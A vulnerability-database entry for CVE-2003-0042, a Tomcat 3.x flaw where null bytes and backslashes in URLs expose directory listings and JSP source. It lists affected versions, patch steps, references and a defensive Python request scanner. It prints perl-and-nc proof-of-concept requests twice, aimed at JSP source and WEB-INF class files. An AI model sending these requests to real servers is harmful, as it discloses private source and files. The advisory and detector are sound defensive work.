CVE-2003-0042
CVSS 5.0
Published: 2003-02-07 00:00:00
Revised: 2016-10-17 22:28:42

[Original] Jakarta Tomcat before 3.3.1a, when used with JDK 1.3.1 or earlier, allows remote attackers to list directories even with an index.html or other file present, or obtain unprocessed source code for a JSP file, via a URL containing a null character.


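[CNNVD] Apache Tomcat Null Byte Directory/File Disclosure Vulnerability (CNNVD-200302-018)

        
        Apache Tomcat is a popular open-source JSP application server.
        The implementation of Apache Tomcat with JDK 1.3.1 and earlier contains a vulnerability that remote attackers may exploit to obtain the contents of directories and files on the server.
        Apache Tomcat mishandles web requests containing null bytes (%00) and backslash ('\') characters, which may disclose the contents of directories and files.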
        

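- CVSS (Base Score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Attack complexity: [--]
Attack vector: [--]
Authentication: [--]

- CPE (Affected Platforms and Products)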

cpe:/a:apache:tomcat:3.2.1  Apache Software Foundation Tomcat 3.2.1
cpe:/a:apache:tomcat:3.3  Apache Software Foundation Tomcat 3.3
cpe:/a:apache:tomcat:3.3.1  Apache Software Foundation Tomcat 3.3.1
cpe:/a:apache:tomcat:3.2  Apache Software Foundation Tomcat 3.2
cpe:/a:apache:tomcat:3.2.3  Apache Software Foundation Tomcat 3.2.3
cpe:/a:apache:tomcat:3.1  Apache Software Foundation Tomcat 3.1
cpe:/a:apache:tomcat:3.2.4  Apache Software Foundation Tomcat 3.2.4
cpe:/a:apache:tomcat:3.0  Apache Software Foundation Tomcat 3.0
cpe:/a:apache:tomcat:3.1.1  Apache Software Foundation Tomcat 3.1.1

- OVAL (Technical Details for Detection)

No related OVAL definition found

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0042
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0042
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200302-018
(Official data source) CNNVD

- Other Links and Resources

http://jakarta.apache.org/builds/jakarta-tomcat/release/v3.3.1a/
(VENDOR_ADVISORY)  CONFIRM  http://jakarta.apache.org/builds/jakarta-tomcat/release/v3.3.1a/
http://jakarta.apache.org/builds/jakarta-tomcat/release/v3.3.1a/RELEASE-NOTES-3.3.1a.txt
(VENDOR_ADVISORY)  CONFIRM  http://jakarta.apache.org/builds/jakarta-tomcat/release/v3.3.1a/RELEASE-NOTES-3.3.1a.txt
http://marc.info/?l=bugtraq&m=104394568616290&w=2
(UNKNOWN)  BUGTRAQ  20030130 Apache Jakarta Tomcat 3 URL parsing vulnerability
http://www.ciac.org/ciac/bulletins/n-060.shtml
(UNKNOWN)  CIAC  N-060
http://www.debian.org/security/2003/dsa-246
(VENDOR_ADVISORY)  DEBIAN  DSA-246
http://www.securityfocus.com/advisories/5111
(UNKNOWN)  HP  HPSBUX0303-249
http://www.securityfocus.com/bid/6721
(UNKNOWN)  BID  6721
http://xforce.iss.net/xforce/xfdb/11194
(UNKNOWN)  XF  tomcat-null-directory-listing(11194)

- Vulnerability Information

Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
Medium  Input validation
2003-02-07 00:00:00 2005-10-20 00:00:00
Remote
        
        

- Advisories and Patches

        Vendor patches:
        Debian
        ------
        Debian has released a security advisory (DSA-246-1) and corresponding patches for this issue:
        DSA-246-1: New tomcat packages fix information exposure and cross site scripting
        Link:
        http://www.debian.org/security/2003/dsa-246

        Patch downloads:
        Source archives:
        
        http://security.debian.org/pool/updates/contrib/t/tomcat/tomcat_3.3a-4woody1.dsc

        Size/MD5 checksum: 714 1c34b1fdedf90ea10531ed12a8c6ae0b
        
        http://security.debian.org/pool/updates/contrib/t/tomcat/tomcat_3.3a-4woody1.diff.gz

        Size/MD5 checksum: 15146 c58c7edd2df1a806b510068ab7a9a04f
        
        http://security.debian.org/pool/updates/contrib/t/tomcat/tomcat_3.3a.orig.tar.gz

        Size/MD5 checksum: 2087545 2df39325c7293ee11ae5547281ca1077
        Architecture independent components:
        
        http://security.debian.org/pool/updates/contrib/t/tomcat/tomcat_3.3a-4woody1_all.deb

        Size/MD5 checksum: 1196810 1ed6efa36586a8a3d3b527aeebbc4531
        Intel IA-32 architecture:
        
        http://security.debian.org/pool/updates/contrib/t/tomcat/libapache-mod-jk_3.3a-4woody1_i386.deb

        Size/MD5 checksum: 51522 1e11d6a43654fc6d921c8bc90ad15b4b
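        Patch installation:
        1. Install the patch package manually:
         First, download the patch with the following command:
         # wget url (url is the patch download link)
         Then install the patch with the following command:
         # dpkg -i file.deb (file is the name of the corresponding patch)
        2. Install the patch package automatically with apt-get:
         First, update the internal database with the following command:
         # apt-get update
        
         Then install the updated packages with the following command:
         # apt-get upgrade
        Apache Software Foundation
        --------------------------
        The vendor has fixed this security issue in version 3.3.1a and later; download it from the vendor's home page: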
        
        http://jakarta.apache.org/tomcat/index.html

- Vulnerability Information (22205)

Apache Tomcat 3.x Null Byte Directory/File Disclosure Vulnerability (EDBID:22205)
linux remote
2003-01-26 Verified
0 Jouko Pynnönen
source: http://www.securityfocus.com/bid/6721/info

Apache Tomcat is prone to a directory/file disclosure vulnerability when used with JDK 1.3.1 or earlier.

It has been reported that remote attackers may view directory contents (even when an 'index.html' or other welcome file is present). It is also possible for remote attackers to disclose the contents of files.

This vulnerability is due to improper handling of null bytes (%00) and backslash ('\') characters in requests for web resources.

GET /<null byte>.jsp HTTP/1.0
$ perl -e 'print "GET /\x00.jsp HTTP/1.0\r\n\r\n";' | nc my.server 8080
$ perl -e 'print "GET /admin/WEB-INF\\classes/ContextAdmin.java\x00.jsp HTTP/1.0\r\n\r\n";'|nc my.server 8080
$ perl -e 'print "GET /examples/jsp/cal/cal1.jsp\x00.html HTTP/1.0\r\n\r\n";'|nc my.server 8080		

- Vulnerability Information

12232
Apache Tomcat with JDK Arbitrary Directory/Source Disclosure
Information Disclosure
Loss of Confidentiality

- Vulnerability Description

Unknown or Incomplete

- Timeline

2003-01-25 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related References

- Vulnerability Author

Unknown or Incomplete

- Vulnerability Information

Apache Tomcat Null Byte Directory/File Disclosure Vulnerability
Input Validation Error 6721
Yes No
2003-01-26 12:00:00 2009-07-11 08:06:00
This vulnerability was discovered by Jouko Pynnönen of Online Solutions Ltd.

- Affected Versions

Apache Software Foundation Tomcat 3.3.1
Apache Software Foundation Tomcat 3.3
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Apache Software Foundation Tomcat 3.2.4
Apache Software Foundation Tomcat 3.2.3
Apache Software Foundation Tomcat 3.2.1
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- HP Secure OS software for Linux 1.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Apache Software Foundation Tomcat 3.2
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Apache Software Foundation Tomcat 3.1.1
Apache Software Foundation Tomcat 3.1
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Conectiva Linux 5.1
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4.1 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Apache Software Foundation Tomcat 3.0
- BSDI BSD/OS 4.0
- Caldera OpenLinux 2.4
- Debian Linux 2.2
- Debian Linux 2.1
- Digital UNIX 4.0
- FreeBSD FreeBSD 5.0
- FreeBSD FreeBSD 4.0
- Mandriva Linux Mandrake 7.1
- Mandriva Linux Mandrake 7.0
- NetBSD NetBSD 1.4.2 x86
- NetBSD NetBSD 1.4 x86
- RedHat Linux 6.2 i386
- RedHat Linux 6.1 i386
- SGI IRIX 6.5
- SGI IRIX 6.4
- Sun Solaris 8_sparc
- Sun Solaris 7.0
Apache Software Foundation Tomcat 3.3.1 a

- Unaffected Versions

Apache Software Foundation Tomcat 3.3.1 a

- Vulnerability Discussion

Apache Tomcat is prone to a directory/file disclosure vulnerability when used with JDK 1.3.1 or earlier.

It has been reported that remote attackers may view directory contents (even when an 'index.html' or other welcome file is present). It is also possible for remote attackers to disclose the contents of files.

This vulnerability is due to improper handling of null bytes (%00) and backslash ('\') characters in requests for web resources.
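
Added example (not part of the original entry or of Tomcat's code): a Python check that percent-decodes a request path, including double-encoded input, and flags the null byte and backslash characters described above. The sample request lines, the function names and the extension-mismatch heuristic are constructed for illustration.

```python
import posixpath
from urllib.parse import unquote_to_bytes

# Constructed request lines for illustration (not taken from real logs).
SAMPLE_REQUESTS = [
    "GET /index.html HTTP/1.0",
    "GET /%00.jsp HTTP/1.0",
    "GET /examples/jsp/cal/cal1.jsp%00.html HTTP/1.0",
    "GET /admin/WEB-INF%5Cclasses/ContextAdmin.java%00.jsp HTTP/1.0",
    "GET /docs/a%2500b.html?x=1 HTTP/1.0",
]

def decode_path(raw, max_rounds=3):
    """Percent-decode repeatedly so double-encoded bytes (%2500) surface."""
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(raw)
        if decoded == raw:
            break
        raw = decoded
    return raw

def inspect_request(line):
    """Return the list of findings for one HTTP request line."""
    parts = line.rstrip("\r\n").split(" ")
    if len(parts) != 3:
        return ["malformed-request-line"]
    # Drop the query string; only the path is mapped to a file.
    raw = parts[1].split("?", 1)[0].encode("utf-8", "surrogateescape")
    path = decode_path(raw)
    findings = []
    if b"\x00" in path:
        findings.append("null-byte")
    if b"\\" in path:
        findings.append("backslash")
    if b"\x00" in path:
        # Heuristic (assumption of this example): the extension of the whole
        # path differs from the extension of the part before the NUL.
        whole_ext = posixpath.splitext(path)[1]
        head_ext = posixpath.splitext(path.split(b"\x00", 1)[0])[1]
        if whole_ext != head_ext:
            findings.append("extension-mismatch")
    return findings

def scan(lines):
    """Map each suspicious request line to its findings."""
    return {ln: f for ln in lines if (f := inspect_request(ln))}

if __name__ == "__main__":
    for line, findings in scan(SAMPLE_REQUESTS).items():
        print(findings, repr(line))
```
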

- Exploit

The following proofs of concept were provided:

GET /<null byte>.jsp HTTP/1.0
$ perl -e 'print "GET /\x00.jsp HTTP/1.0\r\n\r\n";' | nc my.server 8080
$ perl -e 'print "GET /admin/WEB-INF\\classes/ContextAdmin.java\x00.jsp HTTP/1.0\r\n\r\n";'|nc my.server 8080
$ perl -e 'print "GET /examples/jsp/cal/cal1.jsp\x00.html HTTP/1.0\r\n\r\n";'|nc my.server 8080

- Solution

HP has released an advisory (HPSBUX0303-249) that contains fixes to address this issue.

This issue has been addressed in Apache Tomcat 3.3.1a.

Fixes are available:


Apache Software Foundation Tomcat 3.0

Apache Software Foundation Tomcat 3.1

Apache Software Foundation Tomcat 3.1.1

Apache Software Foundation Tomcat 3.2

Apache Software Foundation Tomcat 3.2.1

Apache Software Foundation Tomcat 3.2.3

Apache Software Foundation Tomcat 3.2.4

Apache Software Foundation Tomcat 3.3

Apache Software Foundation Tomcat 3.3.1
